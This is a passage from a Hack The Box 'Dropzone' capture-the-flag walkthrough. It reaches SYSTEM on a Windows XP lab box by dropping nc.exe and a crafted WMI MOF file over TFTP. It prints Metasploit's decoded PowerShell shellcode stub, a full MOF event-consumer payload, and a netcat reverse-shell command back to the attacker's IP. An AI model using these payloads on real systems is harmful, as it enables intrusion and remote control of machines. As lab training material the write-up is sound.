+As you can see, we write the first 6 characters and then ~1 to find the first folder that matches these first 6 characters, and we found the directories we wanted. now let's check if this is a 32bit or a 64bit machine by checking if the Program Files x86 folder exists (which would mean that the Program Files folder is the 64bit folder):
+
+
+ tftp> get /Progra~1
+ Error code 1: Access to the path 'C:\Program Files' is denied.
+ tftp> get /Progra~2
+ Error code 1: Could not find file 'C:\Progra~2'.
+ tftp>
+
+
+
+And here we can see that there is only the Program Files folder, therefore it is safe to assume that this is a 32bit windows machine, and most probably windows XP. From here, we're going to use metasploit's psexec module:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
+ → locate psexec | grep metasploit
+ /usr/share/doc/metasploit-framework/modules/exploit/windows/smb/ms17_010_psexec.md
+ /usr/share/doc/metasploit-framework/modules/exploit/windows/smb/psexec.md
+ /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb
+ /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb
+ /usr/share/metasploit-framework/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
+ /usr/share/metasploit-framework/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb
+ /usr/share/metasploit-framework/modules/exploits/windows/local/current_user_psexec.rb
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb
+ /usr/share/metasploit-framework/tools/exploit/psexec.rb
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
+ → cp /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
+ → vim psexec.rb
+
+
+
+And let's inspect what it does:
+
+
+
+Here we're going to check the powershell part because older windows machines didn't have powershell, which is why most people stepped into a rabbithole by not inspecting what the exploit did exactly, so we're going to check what that execute_powershell_payload function does by looking at where it is actually defined:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
+ → locate psexec | grep metasploit | xargs grep execute_powershell
+ **/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb: def execute_powershell_payload**
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb: execute_powershell_payload
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb: execute_powershell_payload
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb: execute_powershell_payload
+ /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb: execute_powershell_payload
+
+
+
+So here we see the function is defined in the first result:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
+ → cp /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
+ → nano psexec.rb
+
+
+
+And here it is, so first of all this function executes cmd_psh_payload() which takes in 2 arguements, payload.encoded and the architecture (x86 or x64):
+
+
+ def execute_powershell_payload
+ ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
+ command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+
+ if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+ print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+ end
+
+ # Execute the powershell command
+ print_status("Executing the payload...")
+ begin
+ psexec(command)
+ rescue StandardError => exec_command_error
+ fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+ end
+ end
+
+
+
+Now let's generate this cmd_psh_payload() from metasploit's interactive ruby (which is like a debugger feature)
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
+ → msfconsole
+
+ , ,
+ / \
+ ((__---,,,---__))
+ (_) O O (_)_________
+ \ _ / |\
+ o_o \ M S F | \
+ \ _____ | *
+ ||| WW|||
+ ||| |||
+
+
+ =[ metasploit v6.0.22-dev ]
+ + -- --=[ 2086 exploits - 1126 auxiliary - 354 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 7 evasion ]
+
+ Metasploit tip: Metasploit can be configured at startup, see
+ msfconsole --help to learn more
+
+ msf6 > search psexec
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
+ 1 auxiliary/admin/smb/psexec_ntdsgrab normal No PsExec NTDS.dit And SYSTEM Hive Download Utility
+ 2 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
+ 3 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
+ 4 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
+ 5 encoder/x86/service manual No Register Service
+ 6 exploit/windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token
+ 7 exploit/windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution
+ 8 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
+ 9 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
+ 10 exploit/windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution
+
+
+ Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/smb/webexec
+
+ msf6 > use exploit/windows/smb/psexec
+ [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+ msf6 exploit(windows/smb/psexec) > show options
+
+ Module options (exploit/windows/smb/psexec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 445 yes The SMB service port (TCP)
+ SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
+ SERVICE_DISPLAY_NAME no The service display name
+ SERVICE_NAME no The service name
+ SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
+ SMBDomain . no The Windows domain to use for authentication
+ SMBPass no The password for the specified username
+ SMBUser no The username to authenticate as
+
+
+ Payload options (windows/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
+ LHOST 192.168.0.18 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+ msf6 exploit(windows/smb/psexec) > irb
+ [*] Starting IRB shell...
+ [*] You are in exploit/windows/smb/psexec
+
+
+
+So here we are in interactive ruby
+
+
+
+ msf6 exploit(windows/smb/psexec) > irb
+ [*] Starting IRB shell...
+ [*] You are in exploit/windows/smb/psexec
+
+ >>
+
+ >> cmd_psh_payload("IppsecRocks","x86")
+ => "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIABRp4F8CA7VW+2vbSBD+OYH8D0sRaAWKcJNSaCBwtlO3aWPHrfK6uuLYSCN709Wuu7tKo/b6v9+sHolDnbukcMLgfczzm29GykuZWq4kWbyPY/Jja3NjyjQrCPUyNSwnIfFSNTp5H2xs4JUnpLgg+4TO+svlgSoYl8ne3rDUGqRt9tEbsH1joLgUHAwNyN/kfAEato8vryC15Afx/oreCHXJRCtWDVm6ALLdl5m7O1IpcwFF8VJwS/3Pn/1gtv08iV5/LZkw1I8rY6GIMiH8gPwMnMOTagnUH/NUK6NyG51zubsTnUrDcpigtWsYg12ozPgBZoE/DbbUktT5OAPNNfVxOdUq7WeZBmP8kMyc6VmS/EFnrd+PpbS8gOhQWtBqGYO+5imY6C2TmYCPkCeoFVvN5TwJAhS7Vl+AerIUIiRPMUMn8K1D7bFKdFUJpaZWByHWck2eY5WVAhpNf02gTf0DfG45gOD93Nrc2sw7ztjs6yplcLUxq9eA8dGpMrwW2ye9kIzRE7NKV7j1TnQJQXKLLvHmFx9Y+LD+804YRQt99QGPZmeKZwmqtCX1qnfu9GFiHkDOJRxUkhU87bhH16EMuYA6wagTm2BI1G8vIDsAAXNmHW6u2L+ovS64vdUdlFxkoPspVspgVFjE4H4wTSmofyjHUCBCzR7Z5+XIeOikW5ZXnXe3RyF/KJgxIZmW2HJpSGJgArKQ9KXh7VW/tKpe+nfhjkthecqM7cwlQYNi622opLG6TLFkmPlJvISUM+GACMlbnsGgivm88+qvhWHIhMA2QEvXWAY8cenH1hFBY4B10YMoBntYLAUUKFN3/kiwOfZ5S/aaOWwOmX8/vo7KDW8dDh0AK9FhcWOhbEjOuLY4Phymjj+/53xlcGAYQw1tEWjXGLNBZR2fPVOeOjK2kNQAaIvJj7QqBszAyxfNhKDP4ovBt3Tn7Oq0eHXFdsf7z5wj9OR9T4/+XLHxUOuPmTYLJtA29nRXypHSo7ZHp4o7DUrr+f4FtASBsxGnZ4dJXwiVuinhuhkHVDM23BQ7xeXuztpVQG4Fg7vh0R3t7X3CIBFkxCE6Ajm3i7B3s9vr4Rzo3bzoYY6Pz2uolhV1lkI3RmpcWsuithw45L3FRfH/otWWe4F/2X+gdXf2L7ePQrAXNvn+cnz/4El4Pjnzc8YtSsbIVwHNqFwLQMuMlXcJFgXrnreP+xY4Lu32BN8wW5v/APpkNmh5CAAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\""
+
+
+
+And here we have generated our powershell payload containing the "IppsecRocks" command, for the "x86" architecture. So first of all it compresses as gzip and base64 encodes our payload :
+
+
+
+Now we copy that base64 string and echo it out of it's base64 encryption to a file which we know is gzip:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → echo 'H4sIABRp4F8CA7VW+2vbSBD+OYH8D0sRaAWKcJNSaCBwtlO3aWPHrfK6uuLYSCN709Wuu7tKo/b6v9+sHolDnbukcMLgfczzm29GykuZWq4kWbyPY/Jja3NjyjQrCPUyNSwnIfFSNTp5H2xs4JUnpLgg+4TO+svlgSoYl8ne3rDUGqRt9tEbsH1joLgUHAwNyN/kfAEato8vryC15Afx/oreCHXJRCtWDVm6ALLdl5m7O1IpcwFF8VJwS/3Pn/1gtv08iV5/LZkw1I8rY6GIMiH8gPwMnMOTagnUH/NUK6NyG51zubsTnUrDcpigtWsYg12ozPgBZoE/DbbUktT5OAPNNfVxOdUq7WeZBmP8kMyc6VmS/EFnrd+PpbS8gOhQWtBqGYO+5imY6C2TmYCPkCeoFVvN5TwJAhS7Vl+AerIUIiRPMUMn8K1D7bFKdFUJpaZWByHWck2eY5WVAhpNf02gTf0DfG45gOD93Nrc2sw7ztjs6yplcLUxq9eA8dGpMrwW2ye9kIzRE7NKV7j1TnQJQXKLLvHmFx9Y+LD+804YRQt99QGPZmeKZwmqtCX1qnfu9GFiHkDOJRxUkhU87bhH16EMuYA6wagTm2BI1G8vIDsAAXNmHW6u2L+ovS64vdUdlFxkoPspVspgVFjE4H4wTSmofyjHUCBCzR7Z5+XIeOikW5ZXnXe3RyF/KJgxIZmW2HJpSGJgArKQ9KXh7VW/tKpe+nfhjkthecqM7cwlQYNi622opLG6TLFkmPlJvISUM+GACMlbnsGgivm88+qvhWHIhMA2QEvXWAY8cenH1hFBY4B10YMoBntYLAUUKFN3/kiwOfZ5S/aaOWwOmX8/vo7KDW8dDh0AK9FhcWOhbEjOuLY4Phymjj+/53xlcGAYQw1tEWjXGLNBZR2fPVOeOjK2kNQAaIvJj7QqBszAyxfNhKDP4ovBt3Tn7Oq0eHXFdsf7z5wj9OR9T4/+XLHxUOuPmTYLJtA29nRXypHSo7ZHp4o7DUrr+f4FtASBsxGnZ4dJXwiVuinhuhkHVDM23BQ7xeXuztpVQG4Fg7vh0R3t7X3CIBFkxCE6Ajm3i7B3s9vr4Rzo3bzoYY6Pz2uolhV1lkI3RmpcWsuithw45L3FRfH/otWWe4F/2X+gdXf2L7ePQrAXNvn+cnz/4El4Pjnzc8YtSsbIVwHNqFwLQMuMlXcJFgXrnreP+xY4Lu32BN8wW5v/APpkNmh5CAAA' | base64 -d > payload.z
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → file payload.z
+ payload.z: gzip compressed data, last modified: Mon Dec 21 09:21:24 2020, max compression, from Unix, original size modulo 2^32 2169
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → zcat payload.z > payload.powershell
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → zcat payload.z
+ function hKSS {
+ Param ($doCuN, $coFTK)
+ $lnlX = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+
+ return $lnlX.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($lnlX.GetMethod('GetModuleHandle')).Invoke($null, @($doCuN)))), $coFTK))
+ }
+
+ function tdq {
+ Param (
+ [Parameter(Position = 0, Mandatory = $True)] [Type[]] $gXQa,
+ [Parameter(Position = 1)] [Type] $mrjQ = [Void]
+ )
+
+ $yJ = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+ $yJ.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $gXQa).SetImplementationFlags('Runtime, Managed')
+ $yJ.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $mrjQ, $gXQa).SetImplementationFlags('Runtime, Managed')
+
+ return $yJ.CreateType()
+ }
+
+ [Byte[]]$suU = [System.Convert]::**FromBase64String("SXBwc2VjUm9ja3M=")**
+
+ $zcLY = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll VirtualAlloc), (tdq @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $suU.Length,0x3000, 0x40)
+ [System.Runtime.InteropServices.Marshal]::Copy($suU, 0, $zcLY, $suU.length)
+
+ $hXm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll CreateThread), (tdq @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zcLY,[IntPtr]::Zero,0,[IntPtr]::Zero)
+ [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((hKSS kernel32.dll WaitForSingleObject), (tdq @([IntPtr], [Int32]))).Invoke($hXm,0xffffffff) | Out-Null
+
+
+
+So here we know what's the powershell payload metasploit uses and in this there's yet another base64 which is the command we wanted to execute:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → echo "SXBwc2VjUm9ja3M=" | base64 -d
+ IppsecRocks
+
+
+
+So here we see everything metasploit does just to get that powershell command in. But again, this is a x86 windows machine, we don't have powershell to work with. The next option psexec would try is the SMB file upload which does not help us either because from our previous enumeration, the smb ports are not opened. What was required to do in this box, was to check each option psexec.rb does one by one until you stumble on the correct one, which was the MOF one defined as the mof_upload function:
+
+
+ def mof_upload(smb_share)
+ share = "\\\\#{datastore['RHOST']}\\ADMIN$"
+ filename = "#{Rex::Text.rand_text_alpha(8)}.exe"
+
+ # payload as exe
+ print_status("Trying wbemexec...")
+ print_status("Uploading Payload...")
+ if smb_share != 'ADMIN$'
+ print_error('Wbem will only work with ADMIN$ share')
+ return
+ end
+ simple.connect(share)
+ exe = generate_payload_exe
+ fd = smb_open("\\system32\\#{filename}", 'rwct', write: true)
+ fd << exe
+ fd.close
+ print_status("Created %SystemRoot%\\system32\\#{filename}")
+
+ # mof to cause execution of above
+ mofname = Rex::Text.rand_text_alphanumeric(14) + ".MOF"
+ mof = generate_mof(mofname, filename)
+ print_status("Uploading MOF...")
+ fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct', write: true)
+ fd << mof
+ fd.close
+ print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
+
+ # Disconnect from the ADMIN$
+ simple.disconnect(share)
+ end
+
+
+Here the smbfunction will try wbemexec , but it will work only if the smb share is ADMIN$ otherwise wbem wouldn't work. Then it connects, generates an exe payload, only to drop that meterpreter file into system32. Then lastly it uses the generate_mof() function and then uploads the generated payload into \\system32\\wbem\\mof\\ and then it just disconnects. Which means, that you get remote code execution just by dropping a file into that folder. now let's check generate_mof() from interactive ruby mode:
+
+
+
+ msf6 exploit(windows/smb/psexec) > irb
+ [*] Starting IRB shell...
+ [*] You are in exploit/windows/smb/psexec
+
+ >> generate_mof("IppsecRocks","AndIsCool")
+ => "#pragma namespace(\"\\\\\\\\.\\\\root\\\\cimv2\")\nclass MyClass773\n{\n \t[key] string Name;\n};\nclass ActiveScriptEventConsumer : __EventConsumer\n{\n \t[key] string Name;\n \t[not_null] string ScriptingEngine;\n \tstring ScriptFileName;\n \t[template] string ScriptText;\n uint32 KillTimeout;\n};\ninstance of __Win32Provider as $P\n{\n Name = \"ActiveScriptEventConsumer\";\n CLSID = \"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}\";\n PerUserInitialization = TRUE;\n};\ninstance of __EventConsumerProviderRegistration\n{\n Provider = $P;\n ConsumerClassNames = {\"ActiveScriptEventConsumer\"};\n};\nInstance of ActiveScriptEventConsumer as $cons\n{\n Name = \"ASEC\";\n ScriptingEngine = \"JScript\";\n ScriptText = \"\\ntry {var s = new ActiveXObject(\\\"Wscript.Shell\\\");\\ns.Run(\\\"AndIsCool\\\");} catch (err) {};\\nsv = GetObject(\\\"winmgmts:root\\\\\\\\cimv2\\\");try {sv.Delete(\\\"MyClass773\\\");} catch (err) {};try {sv.Delete(\\\"__EventFilter.Name='instfilt'\\\");} catch (err) {};try {sv.Delete(\\\"ActiveScriptEventConsumer.Name='ASEC'\\\");} catch(err) {};\";\n\n};\nInstance of ActiveScriptEventConsumer as $cons2\n{\n Name = \"qndASEC\";\n ScriptingEngine = \"JScript\";\n ScriptText = \"\\nvar objfs = new ActiveXObject(\\\"Scripting.FileSystemObject\\\");\\ntry {var f1 = objfs.GetFile(\\\"wbem\\\\\\\\mof\\\\\\\\good\\\\\\\\IppsecRocks\\\");\\nf1.Delete(true);} catch(err) {};\\ntry {\\nvar f2 = objfs.GetFile(\\\"AndIsCool\\\");\\nf2.Delete(true);\\nvar s = GetObject(\\\"winmgmts:root\\\\\\\\cimv2\\\");s.Delete(\\\"__EventFilter.Name='qndfilt'\\\");s.Delete(\\\"ActiveScriptEventConsumer.Name='qndASEC'\\\");\\n} catch(err) {};\";\n};\ninstance of __EventFilter as $Filt\n{\n Name = \"instfilt\";\n Query = \"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\\"MyClass773\\\"\";\n QueryLanguage = \"WQL\";\n};\ninstance of __EventFilter as $Filt2\n{\n Name = \"qndfilt\";\n Query = \"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \\\"Win32_Process\\\" AND TargetInstance.Name = \\\"AndIsCool\\\"\";\n QueryLanguage = \"WQL\";\n\n};\ninstance of __FilterToConsumerBinding as $bind\n{\n Consumer = $cons;\n Filter = $Filt;\n};\ninstance of __FilterToConsumerBinding as $bind2\n{\n Consumer = $cons2;\n Filter = $Filt2;\n};\ninstance of MyClass773 as $MyClass\n{\n Name = \"ClassConsumer\";\n};\n"
+
+
+Now from here we're going to print out the generate_mof() function by using ruby's puts (print) function:
+
+
+ >> puts generate_mof("IppsecRocks","AndIsCool")
+ #pragma namespace("\\\\.\\root\\cimv2")
+ class MyClass40351
+ {
+ [key] string Name;
+ };
+ class ActiveScriptEventConsumer : __EventConsumer
+ {
+ [key] string Name;
+ [not_null] string ScriptingEngine;
+ string ScriptFileName;
+ [template] string ScriptText;
+ uint32 KillTimeout;
+ };
+ instance of __Win32Provider as $P
+ {
+ Name = "ActiveScriptEventConsumer";
+ CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
+ PerUserInitialization = TRUE;
+ };
+ instance of __EventConsumerProviderRegistration
+ {
+ Provider = $P;
+ ConsumerClassNames = {"ActiveScriptEventConsumer"};
+ };
+ Instance of ActiveScriptEventConsumer as $cons
+ {
+ Name = "ASEC";
+ ScriptingEngine = "JScript";
+ ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"AndIsCool\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass40351\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
+
+ };
+ Instance of ActiveScriptEventConsumer as $cons2
+ {
+ Name = "qndASEC";
+ ScriptingEngine = "JScript";
+ ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\IppsecRocks\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"AndIsCool\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
+ };
+ instance of __EventFilter as $Filt
+ {
+ Name = "instfilt";
+ Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass40351\"";
+ QueryLanguage = "WQL";
+ };
+ instance of __EventFilter as $Filt2
+ {
+ Name = "qndfilt";
+ Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"AndIsCool\"";
+ QueryLanguage = "WQL";
+
+ };
+ instance of __FilterToConsumerBinding as $bind
+ {
+ Consumer = $cons;
+ Filter = $Filt;
+ };
+ instance of __FilterToConsumerBinding as $bind2
+ {
+ Consumer = $cons2;
+ Filter = $Filt2;
+ };
+ instance of MyClass40351 as $MyClass
+ {
+ Name = "ClassConsumer";
+ };
+ => nil
+ >>
+
+
+Now i'll copy this entire output into a file to edit:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → mkdir psexec
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Dropzone]
+ → cd psexec
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → vim generated_mof
+
+
+
+Now from here, we see that our file will be located in \\\\\"wbem\\\\\\\\\\\\\\\mof\\\\\\\\\\\\\\\good\\\\\\\\\\\\\\\IppsecRocks\\\\\ and the command we're running is ns.Run(\"AndIsCool\") which is a javascript command. Essentially MOF works by compiling syntax like this into the wbem database to execute said code. The idea here is to create a "FilterToConsumerBinding" to tie together a "EventFilter" and a "ActiveScriptEventConsumer" so that the FilterToConsumerBinding detects the Filtered Event (which could simply be something like watch when this file appears in the wbem database), it will launch the Script
+
+(for more information about MOF check out these links: [pop pop ret mof](https://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html) and [BlackHat WMI talk from 2015 by Matt Graeber](https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf))
+
+Now let's trim the useless parts out of our generated mof file:
+
+
+ #pragma namespace("\\\\.\\root\\cimv2")
+
+ class MyClass40351
+ {
+ [key] string Name;
+ };
+
+ class ActiveScriptEventConsumer : __EventConsumer
+ {
+ [key] string Name;
+ [not_null] string ScriptingEngine;
+ string ScriptFileName;
+ [template] string ScriptText;
+ uint32 KillTimeout;
+ };
+
+ instance of __Win32Provider as $P
+ {
+ Name = "ActiveScriptEventConsumer";
+ CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
+ PerUserInitialization = TRUE;
+ };
+
+
+ instance of __EventConsumerProviderRegistration
+ {
+ Provider = $P;
+ ConsumerClassNames = {"ActiveScriptEventConsumer"};
+ };
+
+ Instance of ActiveScriptEventConsumer as $cons
+ {
+ Name = "ASEC";
+ ScriptingEngine = "JScript";
+ ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"AndIsCool\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass40351\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
+
+ };
+
+ instance of __EventFilter as $Filt
+ {
+ Name = "instfilt";
+ Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass40351\"";
+ QueryLanguage = "WQL";
+ };
+
+ instance of __FilterToConsumerBinding as $bind
+ {
+ Consumer = $cons;
+ Filter = $Filt;
+ };
+
+ instance of MyClass40351 as $MyClass
+ {
+ Name = "ClassConsumer";
+ };
+
+
+
+and from here, we don't want to run the command "AndIsCool" but we want the command "nc -e cmd 10.10.14.6 9002" so from inside vim you can run the following : **:%s/AndIsCool/nc -e cmd 10.10.14.6 9002/gi** in order to replace the AndIsCool pattern matched by regex to whatever other string we want.
+
+
+
+Now basically what this does is that our EventFilter will detect the creation of Class 27736, and when it gets created, it will launch the code we want (the netcat command)
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → ls -l
+ total 4
+ -rw-r--r-- 1 nothing nothing 1415 Dec 21 11:10 generated_mof
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → locate nc.exe
+ /usr/lib/mono/4.5/cert-sync.exe
+ /usr/share/windows-resources/binaries/nc.exe
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → cp /usr/share/windows-resources/binaries/nc.exe .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → ls -l
+ total 64
+ -rw-r--r-- 1 nothing nothing 1415 Dec 21 11:10 generated_mof
+ -rwxr-xr-x 1 nothing nothing 59392 Dec 21 11:10 nc.exe
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → file nc.exe
+ nc.exe: PE32 executable (console) Intel 80386, for MS Windows
+
+
+
+So now we have the correct 32bit nc.exe file we want, now let's upload it via tftp:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → tftp 10.10.10.90
+ tftp> mode binary
+ tftp> put nc.exe /windows/system32/nc.exe
+ Sent 59392 bytes in 4.3 seconds
+ tftp> quit
+
+
+
+We switched from ascii to binary mode to upload our nc file properly:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [_HTB/Dropzone/psexec]
+ → l
+ total 72K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 11:10 .
+ drwxr-xr-x 3 nothing nothing 4.0K Dec 21 10:48 ..
+ -rw-r--r-- 1 nothing nothing 1.4K Dec 21 11:10 generated_mof
+ -rwxr-xr-x 1 nothing nothing 58K Dec 21 11:10 nc.exe
+
+ [ 10.10.14.6/23 ] [ /dev/pts/16 ] [_HTB/Dropzone/psexec]
+ → tftp 10.10.10.90
+ tftp> put generated_mof /windows/system32/wbem/mof/ippsecrocks.mof
+
+
+
+Here basically we want to put our mof file into the /windows/system32/wbem/mof/ directory where it will be executed automatically
+
+
+
+And we get a connection! now let's try to print the root flag:
+
+## **Part 3 : Getting Root Access**
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.6] from (UNKNOWN) [10.10.10.90] 1051
+ Microsoft Windows XP [Version 5.1.2600]
+ (C) Copyright 1985-2001 Microsoft Corp.
+
+ C:\WINDOWS\system32>type C:\Docume~1\Admini~1\Desktop\root.txt
+ type C:\Docume~1\Admini~1\Desktop\root.txt
+ It's easy, but not THAT easy...
+
+ C:\WINDOWS\system32>type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"
